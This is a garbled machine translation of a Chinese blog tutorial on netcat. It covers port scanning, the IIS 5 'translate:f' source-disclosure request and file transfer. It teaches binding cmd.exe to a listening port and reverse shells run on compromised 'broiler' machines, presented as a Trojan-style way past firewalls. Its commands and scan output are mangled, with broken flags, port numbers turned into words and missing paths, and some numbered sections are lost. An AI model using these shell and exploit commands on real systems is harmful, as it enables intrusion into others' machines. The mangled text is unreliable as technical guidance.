Netcat is known as the ' Swiss Army knife ' of the cyber security community, believing that no one knows it ...
A simple and useful tool to read and write data through a network connection using TCP or UDP protocol. It was designed as a stable backdoor tool,
Can be easily driven directly by other programs and scripts. At the same time, it is also a powerful network debugging and probing tool, able to build the few you need
There are several interesting built-in features for all types of Internet connections (see below for details).
NC Command Explanation
Filed Under:security-ranbo @ 9:08 pm
Netcat is known as the ' Swiss Army knife ' of the cyber security community, believing that no one knows it ...
A simple and useful tool to read and write data through a network connection using TCP or UDP protocol. It was designed as a stable backdoor tool,
Can be easily driven directly by other programs and scripts. At the same time, it is also a powerful network debugging and probing tool, able to build the few you need
There are several interesting built-in features for all types of Internet connections (see below for details).
In China, its version of Windows has two versions, one is the original version written by Chris Wysopal, and the other is compiled by ' Red and black '
After the new ' condensed ' version. The ' condensed ' version of the main program is only more than 10 KB (10 KB of NC is not able to complete the 4th and 5th use of the method described below,
The original NC with this function seems to be 60kb:p), although the "volume" is small, but it has done a lot of work.
First, basic use
Want to connect to somewhere: NC [-options] hostname port[s] [ports] ...
Bind port Waiting for connection: Nc-l-P Port [-options] [hostname] [port]
Parameters:
-e Prog program redirection, once connected, execute [Dangerous!!]
-G Gateway source-routing Hop Point[s], up to 8
-G num source-routing pointer:4, 8, 12, ...
-H Help Information
-I secs delay interval
-L listening mode for inbound connections
-n Specifies the IP address of the number and cannot be used hostname
-O file record 16-binary transfer
-P port Local port number
-R arbitrarily specify local and remote ports
-S addr Local Source Address
-U UDP mode
-V Verbose output--with two-V for more detailed content
-W secs timeout time
-Z turns the input and output off-for scanning
Where the port number can specify one or the specified range with the Lo-hi type.
Example: Scan port
TCP Scan
C:nc>nc-v-z-w2 192.168.0.80 1-140
NET [192.168.0.80] 140 (?)
NET [192.168.0.80] 139 (NETBIOS-SSN) Open
NET [192.168.0.80] 138 (?)
NET [192.168.0.80] 137 (NETBIOS-NS)
NET [192.168.0.80] 136 (?)
NET [192.168.0.80] 135 (EPMAP) Open
NET [192.168.0.80] Bayi (?) Open
NET [192.168.0.80] (HTTP) Open
NET [192.168.0.80] (finger)
NET [192.168.0.80] (SMTP) Open
NET [192.168.0.80] 24 (?)
NET [192.168.0.80] (telnet)
NET [192.168.0.80] (FTP)
UDP scan
C:nc>nc-u-v-z-w2 192.168.0.80 1-140
NET [192.168.0.80] (?) Open
NET [192.168.0.80] 139 (?) Open
NET [192.168.0.80] 138 (NETBIOS-DGM) Open
NET [192.168.0.80] 137 (netbios-ns) Open
NET [192.168.0.80] (?) Open
NET [192.168.0.80] (domain) Open
NET [192.168.0.80] (?) Open
NET [192.168.0.80] Notoginseng (time) Open
NET [192.168.0.80] 7 (ECHO) Open
Second, advanced applications
MIME spoofing for 1.IE
This Site Directory provides the hacker's n-off, after which the N-pass proves that you are getting started. I did it.
http://www.try2hack.nl
The domestic version.
This page tells us that the browser is not IE6.72, our * system is not liunx, we are not from
www.microsoft.com/ms.htm
REDIRECT link in the past, Linux has IE6.72? Microsoft will place it on its page.
http://www.try2hack.nl/cgi-bin/level7.pl
The link?
NC 221.10.222.34 80
get/level/level7.php http/1.1
accept:image/gif,image/x-xbitmap,application/msword,*/*
Referer:http://www.microsoft.com/ms.htm
Accept-language:zh-cn
Accept-encodeing:gzip,deflate
user-agent:mozilla/4.0 (compatible; MSIE6.72; Linux i686)
host:221.10.222.34
Connection:keep-alive
2.IIS 5 "translate:f" Display Code vulnerability
Translate:f Vulnerability mechanism: Send a malformed HTTP GET request to the server side an executable script or related file type (for example. ASP or Global.asa). These files are used for running on the server and will never go to the client, and this request causes IIS to send the contents of the file to the remote client instead of running on the server. The key feature of this malformed HTTP GET request is that the request has a specific header information at the end of the translate:f, and there is a backslash "" appended to the URL. Here's an example ([CRLF] represents a carriage return character)
Note the backslash and Translate:f header information after GET Global.asa.
Get/global.asa http/1.0
host:192.168.0.1
User-agent:sensepostdata
content-type:application/x-www-form-urlencoded
Translate:f
[CRLF]
[CRLF]
Save the above content in a text file (for example, Example.txt)
and send it to a server with this vulnerability.
C:>type Example.txt | NC–NVV 192.168.0.80 80
(UNKNOWN) [192.168.0.80] (?) Open
http/1.1 OK
server:microsoft-iis/5.0
Date:tue, Dec 2002 08:50:46 GMT
Content-type:application/octet-stream
content-length:2790
ETag: "0448299fcd6df1:bea"
Last-modified:wed, 2002 18:50:46 GMT
Accept-ranges:bytes
Cache-control:no-cache
Example:
1) Connect to remote host, example:
Format: NC-NVV 192.168.x.x 80
Explanation: Connecting to the TCP80 port of 192.168.x.x
2) Listen to the local host, example:
Format: nc-l-P 80
Explanation: Listen to the TCP80 port of this machine
3) Scan remote host, example:
Format: nc-nvv-w2-z 192.168.x.x 80-445
Explanation: Scan all ports of 192.168.x.x TCP80 to TCP445
4) remote host binding shell, example:
Format: nc-l-P 5354-t-e C:winntsystem32cmd.exe
Explanation: The Cmdshell of the remote host is bound to the TCP5354 port of the remote host
5) remote host bind shell and reverse connection, example:
Format: NC-T-e c:winntsystem32cmd.exe 192.168.x.x 5354
Explanation: Bind the remote host's Cmdshell and reverse connect to the 192.168.x.x TCP5354 port
These are some of the most basic uses (in fact, there are a lot of NC usage,
When the Mate Pipeline command "|" With the redirect command "" and so on command function more powerful ... )。
=====================================================================================================
Advanced usage:
6) for attack applications, examples:
Format 1:type.exe C:EXPLOIT.TXT|NC-NVV 192.168.x.x 80
Format 2:NC-NVV 192.168.x.x c:log.txt
Explanation: Use '-l ' can continuously listen to a port, until CTRL + C, and output the results to ' c:log.txt ', if the ' > '
Change to ' >> ' to append log
Attached: ' C:log.txt ' for logs, etc.
9) for honeypot use [3], Example:
Format 1:nc-l-P E:log.dat
Nc-l-v-p Port
Parameter explanation:
-L: Listening port, listening for inbound information
-P: followed by local port number
-V: Displays information about the port and, if-VV is used, displays the port for more detailed information
Tip: General people love to use-VV
Nc-l-P 80
This is simple, listen to port 80.
If this command is run on the machine, port 80 is considered open and can deceive a lot of scanners Oh!
Nc-l-p > E:log.dat
Hehe, the function and the above, but added a "> e:log.dat" I think, learned echo
That's the one who ordered it. Create a log.dat log file in E-drive
Nc-l-v-p 80
Similar to the above command, but this time is not recorded in the file, but will be directly displayed in the running NC
On the screen.
Oh, talk so much, to practice under
Nc-l-v-p 80
Then enter the native ip:127.0.0.1 in the browser
Oh, see what?
Likewise, the top two are the same, let's test it out for ourselves.
Command 2: Program orientation
Nc-l-P port-t-e cmd.exe
Local machine: nc-l-P port or nc-l-v-p port
Target machine: nc-e cmd.exe IP Port
Parameter explanation:
-L,-p two parameters have been explained.
e; function is program orientation
-T: Answering in telnet form
Example
Nc-l-P 5277-t-e cmd.exe
Do you know where to run? Never run on your own machine, if you run it, your machine
will become a Telnet server, hehe, explain: listen to the local port 5277
Inbound information, at the same time CMD.exe this program, redirected to Port 5277, when someone connected, let the program CMD.exe in the form of Telnet to respond to the connection requirements.
To put it bluntly, it is to let him become a telnet chicken, so this command to run on your broiler. (narrating: Say so many times when we idiot ah, go down to say!!! )
Oh, let's try to find a broiler, I telnet IP 5277
How about hoho~~?
Local Machine:nc-l-P port (or nc-l-v-p port)
Remote MACHINE:NC-E cmd.exe IP port
You know the Gray dove and God stole it, these two tools are using the rebound port type of Trojan,
What do you mean, bounce port? That is, when the other side of the horse, you do not have to actively connect with each other, that is to say
Instead of sending a request connection from your client to the server running on the other host, the other side is actively connecting you
This can invalidate many firewalls because many firewalls do not check for outbound requests.
Here the two commands together, in the two Trojan can be said to have the same effect. Why?
Cough!! Listen to me tell you!! (Pay 100000000RMB tuition first) Whoa, don't kill me!! )
Nc-l-P 5277 (listen to local 5277 ports)
You can also use
Nc-l-v-p 5277
Run on-premises
And then on the remote machine, find a way to run
NC-E Cmd.exe IP 5277
(You don't really hit "IP" on the meat machine AH) to fight, xxx.xxx.xxx.xxx this!!
Oh, look what happened on the local machine?
This is the rebound ~ ~ Got a shell on the local machine
Command 3: Scan ports
Nc-v IP Port
Nc-v-Z IP port-port
Nc-v-z-u IP port-port
Parameter explanation:
-Z: Turn the input and output off and use it during scanning
Nc-v IP Port
This command is scanned for one port
For example:
Nc-v IP 135
Scan the remote host's port 135 to get some simple information about the port, but for some ports, we can also get more information.
Example: 80 port
We can use NC-V IP 80 and then use the Get method to get information about each other's Web server
Nc-v-Z IP port-port
This command is used to scan a command that is used to quickly scan TCP ports, while Port-port specifies the range of ports scanned
For example:
Nc-v-Z IP 1-200
Can see the opening of 1-200 TCP ports on my machine
Nc-v-z-u IP port-port
This command is more than the previous command-U, the role of this command is still the scan port, just a more than a-u parameter, is used to sweep the UDP port
For example:
Nc-v-z-u IP 1-200
This command will sweep 1-200 of the UDP port
Command 4: Transfer files (hoho,i like)
LOCAL machine:nc-v-N IP Port Y:svr.exe
Parameter explanation:
-N: Specify the IP address of the number
These two commands are combined to transfer files.
First, run the command on the remote machine:
Nc-v-l-p 5277 > C:pulist.exe
Do you remember this order? Oh, is not the same as the monitoring command, yes, yes, this is listening to 5277 port
and write the received information into the C:pulist.exe.
Run on local machine at this time
NC-V-N IP 5277
This article comes from Chinaunix blog, if you look at the original point:Http://blog.chinaunix.net/u1/59178/showart_1296797.html
NC Command Explanation